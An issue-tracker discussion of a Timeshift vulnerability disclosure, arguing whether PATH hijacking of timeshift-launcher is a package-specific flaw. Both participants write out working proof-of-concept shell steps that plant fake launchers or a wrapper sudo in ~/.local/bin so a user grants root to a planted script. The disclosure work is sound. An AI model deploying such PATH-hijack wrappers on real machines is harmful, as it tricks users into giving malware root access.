Unsafe su - -c usage

[parov0z]

Describe the bug
First of all, running GUI Applications as root should be avoided when possible.
But when needed, it at least should be safe.

To Reproduce
Steps to reproduce the behavior:

1. Login as a regular user
2. Execute the following:

cp /usr/share/applications/timeshift-gtk.desktop .local/share/applications/

sed -i "s|timeshift-launcher|env PATH=/home/`whoami`/.local/bin:\$PATH timeshift-launcher|" .local/share/applications/timeshift-gtk.desktop 

update-desktop-database .local/share/applications

cat << EOF > .local/bin/timeshift-gtk                                                       
#!/bin/bash
touch /pwned                           
EOF   

chmod +x .local/bin/timeshift-gtk

3. Now instead of launching timeshift, user will grant root permision to any possible malware
   Now try it yourself
   ls /pwned

Expected behavior
An absolute path should be used in timeshift-launcher to avoid security issue

[ygerlach]

First of all, running GUI Applications as root should be avoided when possible.

agreed.

I read your current concern as:

"a malware on the computer with user privilegdes can make itself look like timeshift and ask user for root"

I dont see where this is an timeshift specific issue.

The app could also disguise itself as the sudo or pkexec command, by placing a script in ~/bin/

And it actually looks different.
Here on my debian 13 vm with normal timeshift:

here after i applied your poc:

As you can see it is different, as it is a different application. We had an issue for some time, that timeshift did not show up as "Timeshift" See #452 But that was fixed in #460

The only option i see to avoid this, is by making timeshift a setuid binary. So it does not need to ask for root, but its automatically granted. i dont think that will make things more secure.

[parov0z]

I dont see where this is an timeshift specific issue.

It is, because timeshift-launcher belongs to timeshift package.

The app could also disguise itself as the sudo or pkexec command, by placing a script in ~/bin/

And yes, it should also use an absolute path to su/sudo/pkeexec

[ygerlach]

It is, because timeshift-launcher belongs to timeshift package.

timeshift-launcher is not required to make this work.

Here a small example to set the same thing up (works even without timeshift installed, but the icon will need to be provided by another way)

.local/share/applications/timeshift-gtk.desktop

[Desktop Entry]
Name=Timeshift
Exec=/home/ygerlach/.local/bin/timeshift-gtk
Type=Application
Terminal=false
Icon=timeshift

.local/bin/timeshift-gtk (with +x)

#!/bin/bash
pkexec /home/ygerlach/.local/bin/timeshift

.local/bin/timeshift (with +x)

#!/bin/bash
touch /pwned

This is how it looks:

We can look into adjusting timeshift-launcher to contain complete paths. I'm not sure if the paths are the same for all distributions where timeshift is installed (this could cause issues!). This will not reduce the attack surface in any meaningfull way.

[ygerlach]

The app could also disguise itself as the sudo or pkexec command, by placing a script in ~/bin/

And yes, it should also use an absolute path to su/sudo/pkeexec

This is not my concern. On a bare system (without timeshift) a malware could do

cat << EOF > ~/.local/bin/sudo
#!/bin/bash

exec /usr/bin/sudo evil_malware_script_here.sh $@
EOF

chmod +x ~/.local/bin/sudo

Same for pkexec, su, gosu, and what ever there is.